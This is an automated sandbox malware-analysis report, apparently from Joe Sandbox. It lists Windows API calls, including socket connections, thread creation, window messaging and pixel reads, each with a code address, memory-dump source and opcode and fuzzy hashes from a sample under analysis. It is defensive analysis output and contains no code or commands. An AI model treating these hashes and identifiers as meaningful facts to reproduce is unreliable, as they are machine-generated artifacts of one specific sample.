                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: AsyncState$ClientCursorScreen
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 4210589936-0
                                                                                                                                                                                                                                                      • Opcode ID: ec1f6c9d5ae8a21eda8b607fd0a4e9d92758b811159ca872143e3477d877a366
                                                                                                                                                                                                                                                      • Instruction ID: d0a2197f25d9028949b573235daaf4de6e55dcd76b97539d8b1539bee1bf997f
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ec1f6c9d5ae8a21eda8b607fd0a4e9d92758b811159ca872143e3477d877a366
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 81419D35904119FBDF199F64C884AEDBBB4FF05334F11431AF829A6290DB34A991EFA0
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 00EFB369
                                                                                                                                                                                                                                                      • PostMessageW.USER32(?,00000201,00000001), ref: 00EFB413
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00EFB41B
                                                                                                                                                                                                                                                      • PostMessageW.USER32(?,00000202,00000000), ref: 00EFB429
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00EFB431
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: MessagePostSleep$RectWindow
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3382505437-0
                                                                                                                                                                                                                                                      • Opcode ID: 9ea4c0b5bd3086fce5ff6357e424494831cd4eecf00f3676188b9b670b3e3407
                                                                                                                                                                                                                                                      • Instruction ID: d14819f5a3379cb559316f3fb39be40f997718d3cfc9eaf30e32040fd0891be2
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9ea4c0b5bd3086fce5ff6357e424494831cd4eecf00f3676188b9b670b3e3407
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E131CC7190021DEBDF04CFA8DD4DAEE3BB5EB45319F108229FA25AA1D1C3B09A14DB90
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • IsWindowVisible.USER32(?), ref: 00EFDBD7
                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00EFDBF4
                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00EFDC2C
                                                                                                                                                                                                                                                      • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00EFDC52
                                                                                                                                                                                                                                                      • _wcsstr.LIBCMT ref: 00EFDC5C
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3902887630-0
                                                                                                                                                                                                                                                      • Opcode ID: b142373ead8977b58958005f84211e9cea78d82fa8b3eba5e449f4a5bd2ff1be
                                                                                                                                                                                                                                                      • Instruction ID: fde1d08d2caa4af6df79896b908f8bf8e18d41fcd695ad33b84f0146d216b354
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b142373ead8977b58958005f84211e9cea78d82fa8b3eba5e449f4a5bd2ff1be
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9E213B71208148BBEB159F39DC49E7FBFADDF45760F11503AF90AEA191EAA1CC41E260
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00EFBC90
                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00EFBCC2
                                                                                                                                                                                                                                                      • __itow.LIBCMT ref: 00EFBCDA
                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00EFBD00
                                                                                                                                                                                                                                                      • __itow.LIBCMT ref: 00EFBD11
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: MessageSend$__itow
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3379773720-0
                                                                                                                                                                                                                                                      • Opcode ID: ac7695ab80c2a5ce8fe0b3d98ee1696b056a840bc9a7bd90ce142d326b188e28
                                                                                                                                                                                                                                                      • Instruction ID: d8d62ab6404da61c42ee4c92f12cec68cc297365d4d07d13e08782bf7bda413f
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ac7695ab80c2a5ce8fe0b3d98ee1696b056a840bc9a7bd90ce142d326b188e28
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BF21C63570060CBADB10AE65CD46FEF7AA8AF5A710F006069FB05FB181DB71C94597A2
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 00EC50E6: _wcsncpy.LIBCMT ref: 00EC50FA
                                                                                                                                                                                                                                                      • GetFileAttributesW.KERNEL32(?,?,?,?,00F060C3), ref: 00F06369
                                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,?,?,00F060C3), ref: 00F06374
                                                                                                                                                                                                                                                      • CreateDirectoryW.KERNEL32(?,00000000,?,?,?,00F060C3), ref: 00F06388
                                                                                                                                                                                                                                                      • _wcsrchr.LIBCMT ref: 00F063AA
                                                                                                                                                                                                                                                        • Part of subcall function 00F06318: CreateDirectoryW.KERNEL32(?,00000000,?,?,?,00F060C3), ref: 00F063E0
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CreateDirectory$AttributesErrorFileLast_wcsncpy_wcsrchr
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3633006590-0
                                                                                                                                                                                                                                                      • Opcode ID: f7fdc1f9c289d8dde540ef6cc191cf3197598118dcb85a94f444232debbe9dc5
                                                                                                                                                                                                                                                      • Instruction ID: 9d0e3e5814c3b1ad57417f69bd714a51361687acfc6911e985ecc1089ff049c2
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f7fdc1f9c289d8dde540ef6cc191cf3197598118dcb85a94f444232debbe9dc5
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D121EE31A0421957DB15EB74AC42FEA339CEF15370F101465F545D72C0EBA0D991B6A4
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 00F1A82C: inet_addr.WSOCK32(00000000), ref: 00F1A84E
                                                                                                                                                                                                                                                      • socket.WSOCK32(00000002,00000001,00000006), ref: 00F18BD3
                                                                                                                                                                                                                                                      • WSAGetLastError.WSOCK32(00000000), ref: 00F18BE2
                                                                                                                                                                                                                                                      • connect.WSOCK32(00000000,?,00000010), ref: 00F18BFE
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: ErrorLastconnectinet_addrsocket
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3701255441-0
                                                                                                                                                                                                                                                      • Opcode ID: 858dfb1a4e4677e4fb8916b03da31aeca2f28f9de9074e2d44893599768178fe
                                                                                                                                                                                                                                                      • Instruction ID: e1b4b1a6f2ed8ecb25f10be7fe3c91c40ac165e22f28b16c13ce6fe88e93f369
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 858dfb1a4e4677e4fb8916b03da31aeca2f28f9de9074e2d44893599768178fe
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4C219F312002149FCB10AB68CD45F7D77A9AF55760F04445DF906A72D2CB74AC4297A1
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • IsWindow.USER32(00000000), ref: 00F18441
                                                                                                                                                                                                                                                      • GetForegroundWindow.USER32 ref: 00F18458
                                                                                                                                                                                                                                                      • GetDC.USER32(00000000), ref: 00F18494
                                                                                                                                                                                                                                                      • GetPixel.GDI32(00000000,?,00000003), ref: 00F184A0
                                                                                                                                                                                                                                                      • ReleaseDC.USER32(00000000,00000003), ref: 00F184DB
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Window$ForegroundPixelRelease
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 4156661090-0
                                                                                                                                                                                                                                                      • Opcode ID: 937abf890d8af06594b9a6f74793eb9f6377db891e05118a6ee8b1b04ab6c38a
                                                                                                                                                                                                                                                      • Instruction ID: 7b1a688e7d946a754ac41c509523d265221161ec7b3d7edc38a14df6b262239c
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 937abf890d8af06594b9a6f74793eb9f6377db891e05118a6ee8b1b04ab6c38a
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1321C336A00204AFD710DFA4DD84AAEBBF9EF49341F048479E84997351DF70AC41EB60
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 00EDAFE3
                                                                                                                                                                                                                                                      • SelectObject.GDI32(?,00000000), ref: 00EDAFF2
                                                                                                                                                                                                                                                      • BeginPath.GDI32(?), ref: 00EDB009
                                                                                                                                                                                                                                                      • SelectObject.GDI32(?,00000000), ref: 00EDB033
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: ObjectSelect$BeginCreatePath
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3225163088-0
                                                                                                                                                                                                                                                      • Opcode ID: a7cd7e80bc31874b2d07b20099b7c327ac21fb6da1b6d348e7f6fd46a2002fa5
                                                                                                                                                                                                                                                      • Instruction ID: b6a2feb242228b811f2d1d8c33b2482a15019e3b7728649080b838f7f37b657a
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a7cd7e80bc31874b2d07b20099b7c327ac21fb6da1b6d348e7f6fd46a2002fa5
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6021717590020DEFDB119F55EC447EA7B6CFB213A5F18432AE861A22A0E3714953EB91
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __calloc_crt.LIBCMT ref: 00EE21A9
                                                                                                                                                                                                                                                      • CreateThread.KERNEL32(?,?,00EE22DF,00000000,?,?), ref: 00EE21ED
                                                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 00EE21F7
                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 00EE2200
                                                                                                                                                                                                                                                      • __dosmaperr.LIBCMT ref: 00EE220B
                                                                                                                                                                                                                                                        • Part of subcall function 00EE7C0E: __getptd_noexit.LIBCMT ref: 00EE7C0E
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CreateErrorLastThread__calloc_crt__dosmaperr__getptd_noexit_free
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 2664167353-0
                                                                                                                                                                                                                                                      • Opcode ID: 059b07082f70babd4706a8665b20365bbf0bcc7a38e861f46076c5e92f256809
                                                                                                                                                                                                                                                      • Instruction ID: d01ddbe8c467afb6ddbfa0c1a38c898deb5758fb77e3e63f3839ba09546022ed
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 059b07082f70babd4706a8665b20365bbf0bcc7a38e861f46076c5e92f256809
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2B11E5321053CE6FDB11AFA69C41DAB77ECEF05764B10142DFB58A6191DB31880196A1
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00EFABD7
                                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,00EFA69F,?,?,?), ref: 00EFABE1
                                                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000008,?,?,00EFA69F,?,?,?), ref: 00EFABF0
                                                                                                                                                                                                                                                      • HeapAlloc.KERNEL32(00000000,?,00EFA69F,?,?,?), ref: 00EFABF7
                                                                                                                                                                                                                                                      • GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 00EFAC0E
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 842720411-0
                                                                                                                                                                                                                                                      • Opcode ID: 50d902935a438b2e95920bb705f5e330c72e330b988d6e2615c3ef97e9fa0c91
                                                                                                                                                                                                                                                      • Instruction ID: 7a737eb163f1debcc0f6ff72024275b12f1d895f4fd9d8134f87a229fbdbaa67
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 50d902935a438b2e95920bb705f5e330c72e330b988d6e2615c3ef97e9fa0c91
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AC018CB4200208BFEB104FA9DC48DBB7BACEF8A3587140429F909D7260DA71DC40DB60
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • CLSIDFromProgID.OLE32 ref: 00EF9ADC
                                                                                                                                                                                                                                                      • ProgIDFromCLSID.OLE32(?,00000000), ref: 00EF9AF7
                                                                                                                                                                                                                                                      • lstrcmpiW.KERNEL32(?,00000000), ref: 00EF9B05
                                                                                                                                                                                                                                                      • CoTaskMemFree.OLE32(00000000,?,00000000), ref: 00EF9B15
                                                                                                                                                                                                                                                      • CLSIDFromString.OLE32(?,?), ref: 00EF9B21
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3897988419-0
                                                                                                                                                                                                                                                      • Opcode ID: 4914598391f740be1fb0f734e637aba20e722cd8b17e50db6bd4139120c7d32b
                                                                                                                                                                                                                                                      • Instruction ID: a064293ab70a10fd7729074aae34e682431272f0099ad7f9adb01dddbf80ea01
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4914598391f740be1fb0f734e637aba20e722cd8b17e50db6bd4139120c7d32b
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BF018B7A60021DBFDB114F68EC44BBEBAEDEB55352F148024FE45E2211D770DD40ABA0
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00F07A74
                                                                                                                                                                                                                                                      • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00F07A82
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00F07A8A
                                                                                                                                                                                                                                                      • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00F07A94
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00F07AD0
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 2833360925-0
                                                                                                                                                                                                                                                      • Opcode ID: 4a287a7708c27afbcf6365f6816813e2d155a5994c2e2e1c1bbeddf2fd4681f6
                                                                                                                                                                                                                                                      • Instruction ID: 6d3195a5386a69e486114f1f44105cf37f3e6b69b2826a14cd1467767d9baab4
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4a287a7708c27afbcf6365f6816813e2d155a5994c2e2e1c1bbeddf2fd4681f6
